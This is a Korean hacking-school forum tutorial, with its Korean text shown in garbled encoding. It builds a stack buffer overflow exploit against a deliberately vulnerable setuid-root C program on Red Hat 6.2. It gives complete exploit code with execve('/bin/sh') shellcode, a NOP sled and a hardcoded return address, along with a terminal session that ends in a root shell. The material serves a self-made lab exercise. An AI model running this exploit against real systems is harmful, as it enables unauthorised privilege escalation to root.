176, 3/9 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   buff3r
   http://#include .
   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1437 [º¹»ç]


À̹ø°­Á´ º°·Î ¶æÀº ¾ø½À´Ï´Ù.
´©±¸µçÁö 1ºÐ¸¸ »ý°¢Çϸé ©¼öÀÖ´Â ÀͽºÇ÷ÎÀÕÀÔ´Ï´Ù .
Á¦°¡ ÀÚÀ¯°­Á½ǿ¡ ¿Ã¸®´Â ÀÌÀ¯´Â .. !
'º°ºûÀ»´ã¾Æ'´ÔÀÇ °­Á¸¦ °ßÁ¦Çϱâ À§Çؼ­ .. !!!! ÀÔ´Ï´Ù .¤»¤»¤»¤»

Àü¿¡ Á¦ Ƽ½ºÅ丮¿¡ ¿Ã·È¾úÁö¸¸ À߸øµÈÁ¡ÀÌ ÀÖ¾î ¼öÁ¤ÇÑ°ÍÀ» ´Ù½Ã ¿Ã¸³´Ï´Ù .!

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0smp on an i686
login: buff3r
Password:
Last login: Sat Mar  6 19:26:44 from 192.168.0.3
[buff3r@testserver buff3r]$ ls -al
total 36
drwx------    3 buff3r   buff3r       4096 Mar  6 19:13 .
drwxr-xr-x    7 root     root         4096 Mar  6 18:54 ..
-rw-------    1 buff3r   buff3r       1239 Mar  6 19:30 .bash_history
-rw-r--r--    1 buff3r   buff3r         24 Mar  6 18:54 .bash_logout
-rw-r--r--    1 buff3r   buff3r        230 Mar  6 18:54 .bash_profile
-rw-r--r--    1 buff3r   buff3r        124 Mar  6 18:54 .bashrc
-rwxr-xr-x    1 buff3r   buff3r        333 Mar  6 18:54 .emacs
-rw-r--r--    1 buff3r   buff3r       3394 Mar  6 18:54 .screenrc
drwxrwxr-x    2 buff3r   buff3r       4096 Mar  6 19:30 exploits
[buff3r@testserver buff3r]$ cd exploits/
[buff3r@testserver exploits]$ ls -al
total 28
drwxrwxr-x    2 buff3r   buff3r       4096 Mar  6 19:30 .
drwx------    3 buff3r   buff3r       4096 Mar  6 19:13 ..
-rw-rw-r--    1 buff3r   buff3r        852 Mar  6 19:27 exploit.c
-rwsr-xr-x    1 root     root        11750 Mar  6 19:14 vuln
-rw-r--r--    1 root     root          109 Mar  6 19:14 vuln.c
[buff3r@testserver exploits]$ cat vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500];
strcpy(buffer,argv[1]);
return ;
}
[buff3r@testserver exploits]$ cat exploit.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0; // ¿ì¸®´Â ¾ÆÁ÷ ret ÀÇ °ªÀ» ¸ð¸¨´Ï´Ù.
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }
        for(i=0; i < 200; i++)
        { buffer[i] = '\x90'; }
        ptr = buffer + 200;
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }    
        buffer[600-1] = 0;        
        execl("./vuln", "vuln", buffer, 0);
        free(buffer);
        return 0;
}
[buff3r@testserver exploits]$ cp vuln buff
[buff3r@testserver exploits]$ ltrace ./buff `perl -e 'print "\x41"x600'`
__libc_start_main(0x080483d0, 2, 0xbffff944, 0x08048298, 0x0804842c <unfinished ...>
__register_frame_info(0x0804945c, 0x08049530, 0xbffff904, 0x080482bd, 0x401081ec) = 0x40108d40
strcpy(0xbffff704, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff704
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[buff3r@testserver exploits]$ vi exploit.c
[buff3r@testserver exploits]$ gcc exploit.c -o exploit
[buff3r@testserver exploits]$ /bin/bash2
[buff3r@testserver exploits]$ ./exploit
bash# id
uid=0(root) gid=501(buff3r) groups=501(buff3r)

·çÆ® ±ÇÇÑÀ» ¾ò¾î³¾¼öÀÖ´Ù .
Áß¿äºÎºÐ¸¸ º¸µµ·Ï ÇÏÀÚ
vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500]; // 500Å©±âÀÇ ¹öÆÛ¸¦ ¼±¾ðÇÑ´Ù

// Stack Status : [BUFFER (500byte)][SFP (4btye)[RET (4byte)]
strcpy(buffer,argv[1]);
return ;
}

exploit.c
¿ø·¡ get_esp °°Àº ÀζóÀÎ ¾î¼Àºí¸® ÇÔ¼ö¸¦ ¼±¾ðÇÑÈÄ ¿ÀÇÁ¼ÂÀ» Âï¾îº¸´Â°ÍÀÌ ÀϹÝÀûÀÎ °ø°Ü¹ýÀÌÁö¸¸ redhat 6.2 ¿¡¼­´Â random stackÀÌ Àû¿ëÀÌ ¾ÈµÇ¹Ç·Î ±×³É Á¤È®ÇÑ ÁÖ¼Ò°ªÀ» ¾ò¾î³¾¼öÀÖÀ¸¹Ç·Î offsetÀÌ ÇÊ¿ä¾ø´Ù.
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0xbffff704; // ¾Æ±î ltrace ¸¦ ÅëÇØ strcpy °¡ ¾î¶² À§Ä¡¿¡ argv[1]À» º¹»çÇÏ´ÂÁö
                             // ¾Ë¾Æ³Â´Ù ±× °ªÀ» ÀÌ¿ëÇÏÀÚ
        buffer = malloc(600); // °ø°Ý½ºÅÃÀ» ±¸¼ºÇϱâ À§ÇÑ ÇÒ´ç
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; } // óÀ½ 600 ¹ÙÀÌÆ®¸¦ ¸ðµÎ ret·Î ä¿î´Ù (0xbffff704)
        for(i=0; i < 200; i++)
        { buffer[i] = '\x90'; } // óÀ½ 200 ¹ÙÀÌÆ®¸¦ ¸ðµÎ NOPÀ¸·Î ä¿î´Ù.
        ptr = buffer + 200;
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }    // óÀ½ + 200 ºÎÅÍ ½©Äڵ带 ³öµÐ´Ù.(NOPµÚ¿¡³öµÐ´Ù.)
        buffer[600-1] = 0;        // ¸Ç³¡À» 0À¸·Î ³¡³½´Ù
        execl("./vuln", "vuln", buffer, 0); // ¿ì¸®°¡ ¸¸µç °ø°Ý ¹öÆÛ¸¦ vuln ÀÇ ÀÎÀÚ·Î

                              // ÁÖ°í vuln À» ½ÇÇàÇÑ´Ù.  
        free(buffer);
        return 0;
}
  Hit : 13402     Date : 2010/03/17 07:51


    
º°ºûÀ»´ã¾Æ ...Çß´ø¸» Ãë¼Ò 2010/03/17  
º°ºûÀ»´ã¾Æ ³» ¾ÕÀ» °¡·Î¸·´Ù´Ï... 2010/03/17  
¼Ò¿ï ³ªº¸´ÙÇÑ»ì¾î¸®´Ù´Ï.. 2010/03/17  
Myers BOF¸Å´Ï¾Æ Buff3r... NOP½ä¸ÅÀΰϹÌ? 2010/03/17  
Aentanis ¸ÓÁö;; 2010/05/23  
Cpgroot .. 2010/08/18  
136   [Æß]¸®´ª½º ¸í·É¾î ¸ðÀ½ -3     G.O.D
 08/28 10329
135   [Æß]¸®´ª½º ¸í·É¾î ¸ðÀ½ -2     G.O.D
 08/28 7455
134   [Æß]¸®´ª½º¸í·É¾î ¸ðÀ½ -1[3]     G.O.D
 08/28 7531
133   ÇØÅ·±â¹ýµéÀÇ ±âº»ÀûÀÎ °³³ä::IPC ½º´ÏÇÎ(IPC Sniffing),ÄÚµåÆÐÄ¡(Code patch)Æí.     Feverbear
 08/28 8213
132   ¸®´ª½º vi ¿¡µðÅÍ°¡ ¾î·Á¿ì½Å ºÐµé²²![3]     o¿£¿äo
 08/26 7460
131   [ÀÚÀÛ] W's ¾ÏÈ£ÇÐ(Cryptology) - ¸ð½ººÎÈ£.[8]     williamlee
 07/26 10905
130   Windows XP - ÇØÅ· »çÀü ŽÁö ¹æ¹ý [ °£´ÜÇÑ Ãʺ¸ TIP ] 2[11]     Ǫ¸¥ÇÏ´Ã
 06/17 8739
129   Windows XP - ÇØÅ· »çÀü ŽÁö ¹æ¹ý [ °£´ÜÇÑ Ãʺ¸ TIP ][11]     Ǫ¸¥ÇÏ´Ã
 06/17 9834
128   [¿¬½À¿ë CÀÚÀÛ] ½ºµµÄí ¼Ò½º[5]     Ilios
 05/24 20088
127   [ÀÚÀÛ] [C¹®Á¦] ¼Ò¼ö¸¸ °É·¯³»±â[2]     ¼Ò¿ï
 03/20 8084
126   [ÀÚÀÛ] [C¹®Á¦] Á¡(.)À» »« ¹®ÀÚ Ãâ·ÂÇϱâ[1]     ¼Ò¿ï
 03/20 6880
  [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â[6]     buff3r
 03/17 13401
124   [ÀÚÀÛ]À©µµ¿ì!! ¼û°ÜÁø ³ÊÀÇ ¸ð½ÀÀ» º¸¿©Áà!!! - 5 -[6]     º°ºûÀ»´ã¾Æ
 03/02 7161
123   [ÀÚÀÛ] FTZ Æ®·¹ÀÌ´× 1~10±îÁö °£´ÜÇÏ°Ô Á¤¸®[14]     ¼Ò¿ï
 03/01 15123
122   [Á¤¸®] ÇØÄ¿½ºÄð F.T.Z trainer Á¤¸® 6 ~ 10[2]     ÃÊÄÝ·¿³ªÀÎ
 03/01 18151
121   [ÀÚÀÛ]ÇØÄ¿½ºÄð 2th ÇØÅ·Ä·ÇÁ Mini CTF Ç®ÀÌ[25]     CodeAche
 02/22 7723
120   BT3¿Í BT4¸¦ ¸ÖƼºÎÆà Çغ¸ÀÚ.[6]     kjwon15
 02/22 8142
119   [ÀÚÀÛ]±¸±Û±³ ±³ÁÖÀÇ ±¸±Û ½Åµµµé¿¡°Ô º¸³»´Â ÆíÁö[14]     Sc0rpion
 02/17 7512
118   [ÀÚÀÛ]À©µµ¿ì!! ¼û°ÜÁø ³ÊÀÇ ¸ð½ÀÀ» º¸¿©Áà!!! - 4 -[18]     º°ºûÀ»´ã¾Æ
 02/17 7510
117   [ÀÚÀÛ] ssh / sftp »ç¿ë¹ý Á¤¸® (Æ÷Æ®¼³Á¤½Ã)[1]     soohosin
 02/15 21302
[ÀÌÀü °Ë»ö]...[1][2] 3 [4][5][6][7][8][9]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org